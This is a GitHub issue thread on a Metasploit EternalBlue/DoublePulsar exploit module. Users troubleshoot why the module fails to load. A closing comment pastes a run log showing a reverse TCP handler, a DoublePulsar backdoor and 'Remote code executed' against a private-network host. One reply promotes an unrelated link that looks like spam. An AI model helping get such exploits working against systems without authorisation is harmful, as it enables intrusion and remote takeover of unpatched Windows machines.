Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1
1.09k stars 520 forks source link

WARNING! The following modules could not be loaded! #27

Open redapple0204 opened 7 years ago

redapple0204 commented 7 years ago

When I copied these modules to /usr/share/metasploit-framework/modules/exploits/windows/smb, and then opened Metasploit, I got this error

[-] WARNING! The following modules could not be loaded! [-] /usr/share/metasploit-framework/modules/exploits/windows/smb/eternalblue_doublepulsar.rb: Msf::Modules::MetasploitClassCompatibilityError Failed to load module (windows/smb/eternalblue_doublepulsar from /usr/share/metasploit-framework/modules/exploits/windows/smb/eternalblue_doublepulsar.rb) due to Missing compatible Metasploit class constant

This is my metasploit version: metasploit v4.11.4-2015071402

NickGoodLuck commented 7 years ago

Try command "reload_all" frist!

redapple0204 commented 7 years ago

@NickGoodLuck Still error!

[-] WARNING! The following modules could not be loaded! [-] /usr/share/metasploit-framework/modules/exploits/windows/smb/eternalblue_doublepulsar.rb: Msf::Modules::MetasploitClassCompatibilityError Failed to load module (windows/smb/eternalblue_doublepulsar from /usr/share/metasploit-framework/modules/exploits/windows/smb/eternalblue_doublepulsar.rb) due to Missing compatible Metasploit class constant

NickGoodLuck commented 7 years ago

wow~~~,did u start the postgresql? If still error, try to update the metasploit, my metasploit edition is v4.14.15-dev-a4f29fbd26 !

redapple0204 commented 7 years ago

@NickGoodLuck Humm.....it is running

redapple@kali ~> /etc/init.d/postgresql status Running clusters: 9.1/main

VKSHRIMALII commented 7 years ago

please go to following link i am 100% sure you will get your solution https://github.com/VKSHRIMALII/metasploitclasscerror

bouquet-cc commented 6 years ago

You can try:

chmod a-x eternalblue_doublepulsar.rb

lilplucky commented 3 years ago

hello guys anyone help me solve this msf6 exploit(windows/smb/eternalblue_doublepulsar) > run

[] Started reverse TCP handler on 192.168.43.95:4444 [] 192.168.43.92:445 - Generating Eternalblue XML data [] 192.168.43.92:445 - Generating Doublepulsar XML data [] 192.168.43.92:445 - Generating payload DLL for Doublepulsar [] 192.168.43.92:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 192.168.43.92:445 - Launching Eternalblue... 0030:err:module:import_dll Loading library fwpkclnt.sys (which is needed by L"C:\windows\system32\drivers\idmwfp.sys") failed (error c000007b). 0030:err:module:import_dll Loading library NETIO.SYS (which is needed by L"C:\windows\system32\drivers\idmwfp.sys") failed (error c000007b). 0030:err:ntoskrnl:ZwLoadDriver failed to create driver L"\Registry\Machine\System\CurrentControlSet\Services\IDMWFP": c0000142 [+] 192.168.43.92:445 - Backdoor is already installed [] 192.168.43.92:445 - Launching Doublepulsar... 002f:err:module:import_dll Loading library fwpkclnt.sys (which is needed by L"C:\windows\system32\drivers\idmwfp.sys") failed (error c000007b). 002f:err:module:import_dll Loading library NETIO.SYS (which is needed by L"C:\windows\system32\drivers\idmwfp.sys") failed (error c000007b). 002f:err:ntoskrnl:ZwLoadDriver failed to create driver L"\Registry\Machine\System\CurrentControlSet\Services\IDMWFP": c0000142 [+] 192.168.43.92:445 - Remote code executed... 3... 2... 1... [] Exploit completed, but no session was created. msf6 exploit(windows/smb/eternalblue_doublepulsar) >